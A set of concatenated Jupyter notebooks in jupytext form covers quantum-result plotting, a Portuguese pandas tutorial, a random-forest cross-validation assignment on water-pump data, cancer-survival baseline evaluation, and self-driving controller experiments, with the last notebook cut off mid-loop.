align='center',
color='lightblue',
label='Results: 95% CI')
plt.errorbar([i for i in range(len(means))],
means,
color='blue',
marker='D',
markersize=4,
linestyle='None',
label='Results: means')
plt.errorbar([i for i in range(len(means))],
[exact_value for _ in range(len(means))],
color='green',
marker='o',
markersize=4,
linestyle='None',
label='Exact result')
plt.errorbar([i for i in range(len(means))],
means,
yerr=precision,
color='red',
marker='None',
markersize=4,
linestyle='None',
label='Precision bound')
plt.xticks([i for i in range(len(means))], precision, size=14)
plt.xlabel(r'$\epsilon$', fontsize=16)
#plt.ylim([0.05, 0.25])
plt.yticks(size=14)
plt.ylabel(r'$p$', fontsize=16)
plt.legend(fontsize=14)
plt.title('Hybrid PBC - Toy Example 2 (1 virtual qubit)', fontsize=18)
plt.show()
# +
fig = plt.figure(constrained_layout=True, figsize=(10, 8))
subfigs = fig.subfigures(2, 1, hspace=0.07)
# Upper subfigure
subplot = subfigs[0].add_subplot(111)
plt.bar([i for i in range(len(means))],
heights,
width=0.8,
bottom=bot_bar,
align='center',
color='lightblue',
label='Results: 95% CI')
plt.errorbar([i for i in range(len(means))],
means,
color='blue',
marker='D',
markersize=4,
linestyle='None',
label='Results: means')
plt.errorbar([i for i in range(len(means))],
[exact_value for _ in range(len(means))],
color='green',
marker='o',
markersize=4,
linestyle='None',
linewidth=1,
label='Exact result')
plt.errorbar([i for i in range(len(means))],
means,
yerr=precision,
color='red',
marker='None',
markersize=4,
linestyle='None',
label='Precision bound')
plt.plot(np.arange(-1, 8, 1), [exact_value for _ in np.arange(-1, 8, 1)],
'--',
color='green',
linewidth=1)
plt.xlim([-0.75, 6.75])
plt.xticks([i for i in range(len(means))], precision, size=14)
plt.xlabel(r'$\epsilon$', fontsize=16)
plt.ylim([0.03, 0.25])
plt.yticks(size=14)
plt.ylabel(r'$p$', fontsize=16)
plt.legend(fontsize=14)
plt.title('Hybrid PBC - Toy Example 2 (1 virtual qubit)', fontsize=18)
# Lower subfigure (left)
subplot = subfigs[1].add_subplot(121)
plt.bar([i for i in range(4)],
heights[0:4],
width=0.8,
bottom=bot_bar[0:4],
align='center',
color='lightblue',
label='Results: 95% CI')
plt.errorbar([i for i in range(4)],
means[0:4],
color='blue',
marker='D',
markersize=4,
linestyle='None',
label='Results: means')
plt.errorbar([i for i in range(4)], [exact_value for _ in range(4)],
color='green',
marker='o',
markersize=4,
linestyle='None',
linewidth=1,
label='Exact result')
plt.errorbar([i for i in range(4)],
means[0:4],
yerr=precision[0:4],
color='red',
marker='None',
markersize=4,
linestyle='None',
label='Precision bound')
plt.plot(np.arange(-1, 8, 1), [exact_value for _ in np.arange(-1, 8, 1)],
'--',
color='green',
linewidth=1)
plt.xlim([-0.75, 3.75])
plt.xticks([i for i in range(4)], precision[0:4], size=14)
plt.xlabel(r'$\epsilon$', fontsize=16)
plt.ylim([0.09, 0.19])
plt.yticks(np.arange(0.09, 0.191, 0.01),
[round(i, 3) for i in np.arange(0.09, 0.191, 0.01)],
size=14)
plt.ylabel(r'$p$', fontsize=16)
# Lower subfigure (right)
subplot = subfigs[1].add_subplot(122)
plt.bar([i for i in range(4)],
heights[3:],
width=0.8,
bottom=bot_bar[3:],
align='center',
color='lightblue',
label='Results: 95% CI')
plt.errorbar([i for i in range(4)],
means[3:],
color='blue',
marker='D',
markersize=4,
linestyle='None',
label='Results: means')
plt.errorbar([i for i in range(4)], [exact_value for _ in range(4)],
color='green',
marker='o',
markersize=4,
linestyle='None',
linewidth=1,
label='Exact result')
plt.errorbar([i for i in range(4)],
means[3:],
yerr=precision[3:],
color='red',
marker='None',
markersize=4,
linestyle='None',
label='Precision bound')
plt.plot(np.arange(-1, 8, 1), [exact_value for _ in np.arange(-1, 8, 1)],
'--',
color='green',
linewidth=1)
plt.xlim([-0.75, 3.75])
plt.xticks([i for i in range(4)], precision[3:], size=14)
plt.xlabel(r'$\epsilon$', fontsize=16)
plt.ylim([0.09, 0.19])
plt.yticks(np.arange(0.09, 0.191, 0.01),
[round(i, 3) for i in np.arange(0.09, 0.191, 0.01)],
size=14)
plt.ylabel(r'$p$', fontsize=16)
fig.savefig("Probability_vs_precision.pdf", bbox_inches='tight')
plt.show()
# -
|
PBComp/ToyExample2/output-hybrid/Result_analysis.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/fabioeomedeiros/Data-Science-Base/blob/main/04_Pandas.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="X1g5ySprmExO"
# ## Data Frame
# + colab={"base_uri": "https://localhost:8080/"} id="g6dwYHTChpqw" outputId="2a513866-2635-473a-d7da-77cf657df1ae"
import pandas as pd
import numpy as np
alunos_dict = {'Nome': ['Ricardo', 'Pedro', 'Roberto', 'Carlos'],
'Notas': [4.0, 9.0, 5.5, 9.0],
'Aprovado': ['N', 'S', 'N', 'S']}
print(alunos_dict)
print(type(alunos_dict))
# + colab={"base_uri": "https://localhost:8080/"} id="mTOkbHWajO8f" outputId="cbf780fc-ff57-41bc-ea45-6416beb3888c"
alunos_df = pd.DataFrame(alunos_dict)
print(alunos_df)
print(type(alunos_df))
# + [markdown] id="7CHp91S2mAUY"
# ### Funções de Data Frame
# + colab={"base_uri": "https://localhost:8080/"} id="Pp02fRupk9xv" outputId="d63b51e3-4460-4073-f41d-9351131d2549"
print(alunos_df)
print(alunos_df.shape) #número de linhas e colunas do Data Frame
print(alunos_df.describe()) #exibe estatísticas do Data Frame
# + [markdown] id="GUEewi9pnwMj"
# ### Filtros Linhas e Colunas
# + colab={"base_uri": "https://localhost:8080/"} id="aYNcmvsgnvt0" outputId="2a0a8cf8-2200-4700-9479-6950cdea39db"
print(alunos_df['Nome']) #Filtra coluna pela chave
# + colab={"base_uri": "https://localhost:8080/"} id="3f3a--97oiMW" outputId="579d77a3-fc47-49d7-f346-34ce52919f39"
print(alunos_df.loc[[0]]) #Filtra linha pela função loc() e índice(s) da(s) linha(s)
print(alunos_df.loc[[1, 3]])
print(alunos_df.loc[[2, 0]])
print(alunos_df.loc[0:2])
# + colab={"base_uri": "https://localhost:8080/", "height": 111} id="lW0Y2THwp1E-" outputId="9b8d006c-9d05-48b8-bc64-e9f12b596379"
alunos_df.loc[alunos_df['Notas'] == 9] #Filtra linha atravéz de chave
# + [markdown] id="fjNj1HWpr3wA"
# ### Construindo outros Data Frames
# + colab={"base_uri": "https://localhost:8080/"} id="01gDfvIDr9ta" outputId="81673024-173f-4aed-c56f-e3eb7032f173"
# print(alunos_df['Nome'])
# print(alunos_df.loc[2:3])
# print(alunos_df.loc[alunos_df['Aprovado'] == 'S'])
#Criando um Data Frame dos alunos aprovados
alunos_aprovados_df = alunos_df.loc[alunos_df['Aprovado'] == 'S']
print(alunos_aprovados_df)
print()
#Criando um Data Frame dos alunos reprovados
alunos_reprovados_df = alunos_df.loc[alunos_df['Aprovado'] == 'N']
print(alunos_reprovados_df)
print()
#Criando um Data Frame de alunos com notas maiores que a média
alunos_media_df = alunos_df.loc[alunos_df['Notas'] >= alunos_df['Notas'].mean()]
print(alunos_media_df)
print(f"Média = {alunos_df['Notas'].mean()}")
|
04_Pandas.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/Samuel-Egbert31415/Breast_Cancer_Metabric/blob/master/LS_DS_223_assignment_flexed.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="WmkBtVFZiNlM"
# Lambda School Data Science
#
# *Unit 2, Sprint 2, Module 3*
#
# ---
# + [markdown] id="6e-FdAl0iNlR"
# # Cross-Validation
#
#
# ## Assignment
# - [ ] [Review requirements for your portfolio project](https://lambdaschool.github.io/ds/unit2), then submit your dataset.
# - [ ] Continue to participate in our Kaggle challenge.
# - [ ] Use scikit-learn for hyperparameter optimization with RandomizedSearchCV.
# - [ ] Submit your predictions to our Kaggle competition. (Go to our Kaggle InClass competition webpage. Use the blue **Submit Predictions** button to upload your CSV file. Or you can use the Kaggle API to submit your predictions.)
# - [ ] Commit your notebook to your fork of the GitHub repo.
#
#
# **You can't just copy** from the lesson notebook to this assignment.
#
# - Because the lesson was **regression**, but the assignment is **classification.**
# - Because the lesson used [TargetEncoder](https://contrib.scikit-learn.org/categorical-encoding/targetencoder.html), which doesn't work as-is for _multi-class_ classification.
#
# So you will have to adapt the example, which is good real-world practice.
#
# 1. Use a model for classification, such as [RandomForestClassifier](https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.RandomForestClassifier.html)
# 2. Use hyperparameters that match the classifier, such as `randomforestclassifier__ ...`
# 3. Use a metric for classification, such as [`scoring='accuracy'`](https://scikit-learn.org/stable/modules/model_evaluation.html#common-cases-predefined-values)
# 4. If you’re doing a multi-class classification problem — such as whether a waterpump is functional, functional needs repair, or nonfunctional — then use a categorical encoding that works for multi-class classification, such as [OrdinalEncoder](https://contrib.scikit-learn.org/categorical-encoding/ordinal.html) (not [TargetEncoder](https://contrib.scikit-learn.org/categorical-encoding/targetencoder.html))
#
#
#
# ## Stretch Goals
#
# ### Reading
# - <NAME>, [Python Data Science Handbook, Chapter 5.3](https://jakevdp.github.io/PythonDataScienceHandbook/05.03-hyperparameters-and-model-validation.html), Hyperparameters and Model Validation
# - <NAME>, [Statistics for Hackers](https://speakerdeck.com/jakevdp/statistics-for-hackers?slide=107)
# - <NAME>, [A Programmer's Guide to Data Mining, Chapter 5](http://guidetodatamining.com/chapter5/), 10-fold cross validation
# - <NAME>, [A Basic Pipeline and Grid Search Setup](https://github.com/rasbt/python-machine-learning-book/blob/master/code/bonus/svm_iris_pipeline_and_gridsearch.ipynb)
# - <NAME>, [A Comparison of Grid Search and Randomized Search Using Scikit Learn](https://blog.usejournal.com/a-comparison-of-grid-search-and-randomized-search-using-scikit-learn-29823179bc85)
#
# ### Doing
# - Add your own stretch goals!
# - Try other [categorical encodings](https://contrib.scikit-learn.org/categorical-encoding/). See the previous assignment notebook for details.
# - In additon to `RandomizedSearchCV`, scikit-learn has [`GridSearchCV`](https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.GridSearchCV.html). Another library called scikit-optimize has [`BayesSearchCV`](https://scikit-optimize.github.io/notebooks/sklearn-gridsearchcv-replacement.html). Experiment with these alternatives.
# - _[Introduction to Machine Learning with Python](http://shop.oreilly.com/product/0636920030515.do)_ discusses options for "Grid-Searching Which Model To Use" in Chapter 6:
#
# > You can even go further in combining GridSearchCV and Pipeline: it is also possible to search over the actual steps being performed in the pipeline (say whether to use StandardScaler or MinMaxScaler). This leads to an even bigger search space and should be considered carefully. Trying all possible solutions is usually not a viable machine learning strategy. However, here is an example comparing a RandomForestClassifier and an SVC ...
#
# The example is shown in [the accompanying notebook](https://github.com/amueller/introduction_to_ml_with_python/blob/master/06-algorithm-chains-and-pipelines.ipynb), code cells 35-37. Could you apply this concept to your own pipelines?
#
# + [markdown] id="pz4COPuJiNlS"
# ### BONUS: Stacking!
#
# Here's some code you can use to "stack" multiple submissions, which is another form of ensembling:
#
# ```python
# import pandas as pd
#
# # Filenames of your submissions you want to ensemble
# files = ['submission-01.csv', 'submission-02.csv', 'submission-03.csv']
#
# target = 'status_group'
# submissions = (pd.read_csv(file)[[target]] for file in files)
# ensemble = pd.concat(submissions, axis='columns')
# majority_vote = ensemble.mode(axis='columns')[0]
#
# sample_submission = pd.read_csv('sample_submission.csv')
# submission = sample_submission.copy()
# submission[target] = majority_vote
# submission.to_csv('my-ultimate-ensemble-submission.csv', index=False)
# ```
# + id="W3xS_hUDiNlS"
# %%capture
import sys
# If you're on Colab:
if 'google.colab' in sys.modules:
DATA_PATH = 'https://raw.githubusercontent.com/LambdaSchool/DS-Unit-2-Kaggle-Challenge/master/data/'
# !pip install category_encoders==2.*
# If you're working locally:
else:
DATA_PATH = '../data/'
# + id="Nn4P7LZliNlT"
import pandas as pd
# Merge train_features.csv & train_labels.csv
train = pd.merge(pd.read_csv(DATA_PATH+'waterpumps/train_features.csv'),
pd.read_csv(DATA_PATH+'waterpumps/train_labels.csv'))
# Read test_features.csv & sample_submission.csv
test = pd.read_csv(DATA_PATH+'waterpumps/test_features.csv')
sample_submission = pd.read_csv(DATA_PATH+'waterpumps/sample_submission.csv')
# + [markdown] id="BGif1Dp0izKw"
# #I. Wrangle
# + colab={"base_uri": "https://localhost:8080/"} id="YlIlLyeJiNlT" outputId="979160fa-0e88-4164-fe5b-4ff54ed4d584"
import category_encoders as ce
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from sklearn.impute import SimpleImputer
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline
from sklearn.ensemble import RandomForestClassifier
def wrangle(X):
"""Wrangles train, validate, and test sets in the same way"""
X = X.copy()
# Convert date_recorded to datetime
X['date_recorded'] = pd.to_datetime(X['date_recorded'], infer_datetime_format=True)
# Extract components from date_recorded, then drop the original column
X['year_recorded'] = X['date_recorded'].dt.year
X['month_recorded'] = X['date_recorded'].dt.month
X['day_recorded'] = X['date_recorded'].dt.day
X = X.drop(columns='date_recorded')
# Engineer feature: how many years from construction_year to date_recorded
X['years'] = X['year_recorded'] - X['construction_year']
# Drop recorded_by (never varies) and id (always varies, random)
unusable_variance = ['recorded_by', 'id']
X = X.drop(columns=unusable_variance)
# Drop duplicate columns
duplicate_columns = ['quantity_group']
X = X.drop(columns=duplicate_columns)
# About 3% of the time, latitude has small values near zero,
# outside Tanzania, so we'll treat these like null values
X['latitude'] = X['latitude'].replace(-2e-08, np.nan)
# When columns have zeros and shouldn't, they are like null values
cols_with_zeros = ['construction_year', 'longitude', 'latitude', 'gps_height', 'population']
for col in cols_with_zeros:
X[col] = X[col].replace(0, np.nan)
return X
# + id="HUlwfmB_i9VS"
#apply the wrangle function to the test and train sets
train_df = wrangle(train)
# + id="vCBWVoZAvcTC"
test_df = wrangle(test)
# + [markdown] id="t7rfthR8jNTX"
# #II. Split Data
# + id="7Nphc0oJjBiT"
target = 'status_group'
X_train = train_df.drop('status_group', axis = 1)
y_train = train_df['status_group']
#Since we are doing K-fold validation, we don't need to manually create a validation set
# + id="6PVUsOklvMLj"
X_test = test_df
# + [markdown] id="6ixK7MlykKDw"
# #III. Build Model
# + id="c2GFbImPjZl6"
#Import statements
#Since we are doing classification, not regression, we will import the machinery needed for Random Forest
from sklearn.pipeline import make_pipeline
from category_encoders import OrdinalEncoder
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.impute import SimpleImputer
import category_encoders as ce
from sklearn.model_selection import cross_val_score
rf_model = make_pipeline(ce.OrdinalEncoder(),
SimpleImputer(),
RandomForestClassifier(random_state=42))
# + id="ds2XlIQTlUXx"
rfmodel_cvs = cross_val_score(rf_model, X_train, y_train, cv=5, n_jobs=-1)
# + colab={"base_uri": "https://localhost:8080/"} id="ukJBx3wJmNlL" outputId="37e05e84-1116-494c-bc14-b35a495f77d7"
print("random forest classifier:")
print("cross validation score series is", rfmodel_cvs)
print("cross validation score mean is", rfmodel_cvs.mean())
print("cross validation score standard deviation is", rfmodel_cvs.std())
# + [markdown] id="DhYDpL6smj7P"
# #IV. Tune Model
# + id="fZ1xw7jempLR"
from sklearn.model_selection import GridSearchCV, RandomizedSearchCV
import numpy as np
# + id="kZNUUMJumuaa"
#setting some hyper-parameters to be modified
paras = {'randomforestclassifier__n_estimators': np.arange(20, 65, 22),
'randomforestclassifier__max_depth': np.arange(10, 31, 10),
'randomforestclassifier__max_samples': np.arange(0.3, 0.71, 0.2)}
rf_gs = GridSearchCV(rf_model, paras, cv=5, n_jobs=-1, verbose=1)
# + colab={"base_uri": "https://localhost:8080/"} id="1-upeCcbne1D" outputId="b156bba7-147e-421b-b0d3-ca7ca79aad01"
rf_gs.fit(X_train, y_train)
# + colab={"base_uri": "https://localhost:8080/", "height": 565} id="CX9hNAy9nwDi" outputId="356f72ea-ec05-4f3c-c134-aa090cbb735a"
pd.DataFrame(rf_gs.cv_results_).sort_values(by='mean_test_score', ascending=False).T
# + colab={"base_uri": "https://localhost:8080/"} id="OnaCxxRNpUnR" outputId="76cf95cb-2c4a-4f43-cf55-b253f37bd51d"
rf_gs.best_estimator_
# + colab={"base_uri": "https://localhost:8080/"} id="2W136HYVpY4w" outputId="702f9d96-d5ae-4309-d932-f3ada6d7d51e"
rf_gs.best_score_
# + colab={"base_uri": "https://localhost:8080/"} id="pjhspr7gpaXK" outputId="dbf774aa-b07a-497d-97cf-c3ee2b08313c"
rf_gs.best_params_
# + id="6HjuA6t2rB1T"
#Let's try the same with randomized search
# + id="Fg4_QexxrGRQ"
rf_rs = RandomizedSearchCV(rf_model, param_distributions=paras, n_iter=3, cv=5, n_jobs=-1, verbose=1)
# + colab={"base_uri": "https://localhost:8080/"} id="o2Fnm4tXrKdB" outputId="b263d030-503e-4cf9-aa0d-14c1ee8dbbab"
rf_rs.fit(X_train, y_train)
# + colab={"base_uri": "https://localhost:8080/"} id="iVD_xJNJrO7E" outputId="805fff17-279b-4b0e-ae73-1bd36daff219"
rf_rs.best_score_
# + id="bkljdaj6riKy"
#Lower than our grid search, but much faster
# + [markdown] id="JbCYtSUyrqpn"
# #V. Visualize
# + colab={"base_uri": "https://localhost:8080/", "height": 283} id="NcLPuFMsrmm6" outputId="db23ae50-a7c6-4313-90c0-4a31de717982"
importances = rf_gs.best_estimator_.named_steps['randomforestclassifier'].feature_importances_
features = X_train.columns
pd.Series(importances, index=features).sort_values().tail(10).plot(kind='barh')
# + [markdown] id="1J_yBMHqsnm3"
# #VI. Kaggle
# + id="kq7IpC-htNoi"
X_test = wrangle(test)
# # Makes a dataframe with two columns, id and status_group,
# # and writes to a csv file, without the index
y_pred = rf_gs.predict(X_test)
DATA_PATH = 'https://raw.githubusercontent.com/LambdaSchool/DS-Unit-2-Kaggle-Challenge/master/data/'
sample_submission = pd.read_csv(DATA_PATH+'waterpumps/sample_submission.csv')
submission = sample_submission.copy()
submission['status_group'] = y_pred
submission.to_csv('your-submission-filename.csv', index=False)
# + colab={"base_uri": "https://localhost:8080/", "height": 407} id="O5nGvEWXtb6K" outputId="d53fe9bf-d0e2-4f09-a2a6-db1159343c84"
submission
# + id="7p2R6CD2teIh"
submission.to_csv('2020-01-20_kaggle_submission.csv', index=False)
# + id="1OC8218UsmwN"
|
LS_DS_223_assignment_flexed.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <a id='Top'></a>
#
# # Unimodal inputs<a class='tocSkip'></a>
#
# Evaluation metric results for MultiSurv with unimodal data inputs compared with baseline models.
# + code_folding=[]
# %load_ext autoreload
# %autoreload 2
# %load_ext watermark
import sys
import os
import copy
from IPython.display import clear_output
import ipywidgets as widgets
import numpy as np
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
from sklearn.decomposition import PCA
# Make modules in "src" dir visible
project_dir = os.path.split(os.getcwd())[0]
if project_dir not in sys.path:
sys.path.append(os.path.join(project_dir, 'src'))
import dataset
import utils
matplotlib.style.use('multisurv.mplstyle')
# + [markdown] toc=true
# <h1>Table of Contents<span class="tocSkip"></span></h1>
# <div class="toc"><ul class="toc-item"><li><span><a href="#Input-data" data-toc-modified-id="Input-data-1"><span class="toc-item-num">1 </span>Input data</a></span></li><li><span><a href="#Dimensionality-reduction" data-toc-modified-id="Dimensionality-reduction-2"><span class="toc-item-num">2 </span>Dimensionality reduction</a></span></li><li><span><a href="#Tune-models" data-toc-modified-id="Tune-models-3"><span class="toc-item-num">3 </span>Tune models</a></span></li><li><span><a href="#Evaluate" data-toc-modified-id="Evaluate-4"><span class="toc-item-num">4 </span>Evaluate</a></span><ul class="toc-item"><li><span><a href="#Write-to-results-table" data-toc-modified-id="Write-to-results-table-4.1"><span class="toc-item-num">4.1 </span>Write to results table</a></span></li></ul></li></ul></div>
# -
DATA = utils.INPUT_DATA_DIR
# ## Functions<a class='tocSkip'></a>
def dataset_to_df(pytorch_dataset, modality):
data_dict = {'time': [],
'event': [],
'patient_id': []}
n_vars = {
# 'clinical': 15,
'clinical': 10,
'mRNA': 1000,
'miRNA': 1881,
'DNAm': 5000,
'CNV': 2000
}
for i in range(n_vars[modality]):
data_dict[str(i)] = []
for i, patient_data in enumerate(pytorch_dataset):
data, time, event, pid = patient_data
print('\r' + f'Load all patient data: {str((i + 1))}/{len(pytorch_dataset)} ',
end='')
data_dict['time'].append(time)
data_dict['event'].append(event)
data_dict['patient_id'].append(pid)
if modality == 'clinical':
for j, x in enumerate(data[modality][0]):
data_dict[str(j)].append(int(x))
for x in data[modality][1]:
j += 1
data_dict[str(j)].append(round(float(x), 6))
elif modality == 'CNV':
for j, x in enumerate(data[modality]):
data_dict[str(j)].append(int(x))
else:
for j, x in enumerate(data[modality]):
data_dict[str(j)].append(round(float(x), 6))
print()
df = pd.DataFrame.from_dict(data_dict)
df.set_index('patient_id', inplace=True)
return df
# # Input data
modality = widgets.Select(
options=['clinical', 'mRNA', 'DNAm', 'miRNA', 'CNV'],
index=0,
rows=5,
description='Input data',
disabled=False
)
display(modality)
dataloaders = utils.get_dataloaders(
data_location=DATA,
labels_file='../data/labels.tsv',
modalities=[modality.value],
# wsi_patch_size=299,
# n_wsi_patches=5,
batch_size=256,
# exclude_patients=exclude_cancers
return_patient_id=True
)
# +
# %%time
data_groups = ['train', 'val', 'test']
data_dfs = {
x: dataset_to_df(pytorch_dataset=dataloaders[x].dataset,
modality=modality.value)
for x in data_groups
}
print()
print()
# -
# One-hot encode categorical variables (present in clinical and CNV data)
if modality.value in ['clinical', 'CNV']:
if modality.value == 'clinical':
# cols = [str(x) for x in range(14)]
cols = [str(x) for x in range(9)]
elif modality.value == 'CNV':
cols = data_dfs['train'].columns[2:]
# Convert index to regular column
for group in data_groups:
data_dfs[group].reset_index(level=['patient_id'], inplace=True)
temp = pd.get_dummies(
pd.concat([data_dfs['train'], data_dfs['val'], data_dfs['test']], keys=[0, 1, 2]),
columns=cols, drop_first=True)
data_dfs['train'], data_dfs['val'], data_dfs['test'] = temp.xs(0), temp.xs(1), temp.xs(2)
# Put index back
for group in data_groups:
data_dfs[group].set_index('patient_id', inplace=True)
data_dfs['train'].shape
data_dfs['val'].shape
data_dfs['test'].shape
data_dfs['test'].head(3)
# # Dimensionality reduction
#
# Reduce dimensions to speed up classical algorithms.
# +
def reduce_dim(train, val, test, n):
pca = PCA(n_components=n)
pca.fit(train)
train = pca.transform(train)
val = pca.transform(val)
test = pca.transform(test)
return train, val, test
if modality.value != 'clinical': # 52 variables only
pca = copy.deepcopy(data_dfs)
# Get components
pca['train'], pca['val'], pca['test'] = reduce_dim(
data_dfs['train'].iloc[:, 2:],
data_dfs['val'].iloc[:, 2:],
data_dfs['test'].iloc[:, 2:], 50)
# Add labels back
for group in data_groups:
pca[group] = pd.concat(
[data_dfs[group].iloc[:, :2],
pd.DataFrame(pca[group]).set_index(data_dfs[group].index)], axis=1)
# -
# # Tune models
#
# * CPH ([Cox, 1972](https://www.jstor.org/stable/2985181?seq=1));
# * RSF ([Ishwaran *et al.*, 2008](https://arxiv.org/abs/0811.1645));
# * DeepSurv ([Katzman *et al.*, 2018](https://bmcmedresmethodol.biomedcentral.com/articles/10.1186/s12874-018-0482-1));
# * CoxTime ([Kvamme *et al.*, 2019](http://jmlr.org/papers/volume20/18-424/18-424.pdf));
# * DeepHit ([Lee *et al.*, 2018](http://medianetlab.ee.ucla.edu/papers/AAAI_2018_DeepHit));
# * MTLR ([Fotso, 2018](https://arxiv.org/abs/1801.05512));
# * Nnet-survival ([Gensheimer and Narasimhan, 2019](https://peerj.com/articles/6257/); [Kvamme and Borgan, 2019](https://arxiv.org/abs/1910.06724)).
# +
pycox_methods = ['DeepSurv', 'CoxTime', 'DeepHit', 'MTLR', 'Nnet-survival']
methods = ['CPH', 'RSF'] + pycox_methods
algorithm = widgets.Select(
options=methods,
index=0,
rows=len(methods),
description='Input data',
disabled=False
)
display(algorithm)
# -
def prepare_data(data, modality, algorithm):
data = data_dfs # full data
description = f'full {modality} data'
if algorithm in ['CPH', 'RSF']:
if modality != 'clinical':
data = pca # PCA-decomposed data
description = f'reduced {modality} data (PCA)'
return data, description
# Get data
data, data_name = prepare_data(data_dfs, modality=modality.value, algorithm=algorithm.value)
# +
# Fit model
print(f'Fitting {algorithm.value} model on {data_name}...')
print()
if algorithm.value == 'CPH':
baseline = utils.Baselines(algorithm.value, data)
baseline.fit(show_progress=False, step_size=1.0)
elif algorithm.value == 'RSF':
baseline = utils.Baselines(algorithm.value, data, n_trees=50)
baseline.fit()
elif algorithm.value in pycox_methods:
# n_neurons = [32, 32]
n_neurons = [64, 32]
# n_neurons = [128, 64]
# n_neurons = [128, 64, 32]
best_baseline = baseline
baseline = utils.Baselines(algorithm.value, data, n_neurons=n_neurons)
baseline.fit(batch_size=256, verbose=True)
# -
if algorithm.value in pycox_methods:
_ = baseline.training_log.plot()
else:
clear_output()
# +
# %%time
print(f'{algorithm.value} model fit on {data_name}...')
print()
check_results = {'train': None, 'val': None}
for group in check_results.keys():
print(f'~ {group} ~')
performance = utils.Evaluation(model=baseline.model, dataset=baseline.data[group])
performance.compute_metrics()
performance.show_results()
print()
# +
# %%time
print(f'{algorithm.value} model fit on {data_name}...')
print()
check_results = {'train': None, 'val': None}
for group in check_results.keys():
print(f'~ {group} ~')
performance = utils.Evaluation(model=best_baseline.model, dataset=best_baseline.data[group])
performance.compute_metrics()
performance.show_results()
print()
# -
# # Evaluate
# + active=""
# print(best_baseline.model.net)
# +
# %%time
baseline = best_baseline
performance = utils.Evaluation(model=baseline.model, dataset=baseline.data['test'])
performance.run_bootstrap(n=1000)
print()
# -
print(f'>> {algorithm.value}: {modality.value} <<')
print()
performance.show_results()
# ## Write to results table
results = utils.ResultTable()
results.write_result_dict(result_dict=performance.format_results(),
algorithm=algorithm.value,
data_modality=modality.value)
results.table
# # Watermark<a class='tocSkip'></a>
# %watermark --iversions
# %watermark -v
print()
# %watermark -u -n
# [Top of the page](#Top)
|
figures_and_tables/table-baseline_evaluation.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # CAN Self-Driving Car Experiments
# ## 0. Initalize Setting
#
# ```python
# distance_2_tangent: 20
# angle_at_tangent: 0.4
# ```
#
# 53px ~ 12.5cm
# 1px ~ 0.2358 cm
# 1 ts = 0.2s
# +
import matplotlib.pyplot as plt
import numpy as np
TIME_CONVERTER = 0.2
DIS_CONVERTER = 0.2358
# -
# ## 1. P-Controller
# record loading
dis_rec_list = np.zeros((10, 200))
for i in range(10):
cur_rec = np.load('./p-controller/record-' + str(i+1) + '.npy')
dis_rec_list[i] = cur_rec[:200, 0]
for i, rec in enumerate(dis_rec_list):
plt.plot(rec)
plt.title('Test Case ' + str(i+1))
plt.xlabel('time step')
plt.ylabel('distance to tangent')
# plt.show()
plt.figure(0)
for rec in dis_rec_list:
plt.title('All Test Cases')
plt.xlabel('time step')
plt.ylabel('distance to tangent')
plt.plot(rec)
# +
dis_mean_list = np.mean(dis_rec_list, axis=0)
dis_max_list = np.max(dis_rec_list, axis=0)
dis_min_list = np.min(dis_rec_list, axis=0)
plt.title('Mean Case')
plt.xlabel('time step')
plt.ylabel('distance to tangent')
plt.plot(dis_mean_list)
plt.fill_between(x, dis_max_list, dis_min_list, color='grey', alpha='0.5')
# -
# ***
# ## 2. PI-Controller
dis_rec_pi_list = np.zeros((10, 200))
for i in range(10):
cur_rec = np.load('./pi-controller/record-pi-' + str(i+1) + '.npy')
dis_rec_pi_list[i] = cur_rec[:200, 0]
for i, rec in enumerate(dis_rec_pi_list):
plt.plot(rec)
plt.title('PI Test Case ' + str(i+1))
plt.xlabel('time step')
plt.ylabel('distance to tangent')
# plt.show()
plt.figure(1)
for rec in dis_rec_pi_list:
plt.title('PI All Test Cases')
plt.xlabel('time step')
plt.ylabel('distance to tangent')
plt.plot(rec)
# +
dis_mean_pi = np.mean(dis_rec_pi_list, axis=0)
dis_max_pi = np.max(dis_rec_pi_list, axis=0)
dis_min_pi = np.min(dis_rec_pi_list, axis=0)
# Plot lines
x = np.arange(0, 200, 1)
mean_line, = plt.plot(x, dis_mean_pi, label='mean')
# max_line, = plt.plot(x, dis_max_pi, label='max')
# min_line, = plt.plot(x, dis_min_pi, label='min')
# plt.legend(handles=[mean_line, max_line, min_line])
plt.fill_between(x, dis_max_pi, dis_min_pi, color='grey', alpha='0.5')
# -
# ***
# ## 3. Comparison
# +
plt.figure(2)
p_line, = plt.plot(dis_mean_list, label='P-Controller')
pi_line, = plt.plot(dis_mean_pi, label='PI-Controller')
plt.legend(handles=[p_line, pi_line])
plt.fill_between(x, dis_max_list, dis_min_list, color='blue', alpha='0.3')
plt.fill_between(x, dis_max_pi, dis_min_pi, color='green', alpha='0.3')
# -
# ## 4. Learning Process
# ## 4.1 PI Conrtoller: Performance through time
its = [5, 9, 50]
l = [None, None, None]
plt.figure(10)
plt.title('PI Controller Learning process')
plt.xlabel('time step')
plt.ylabel('distance to tangent')
for inx, i in enumerate(its):
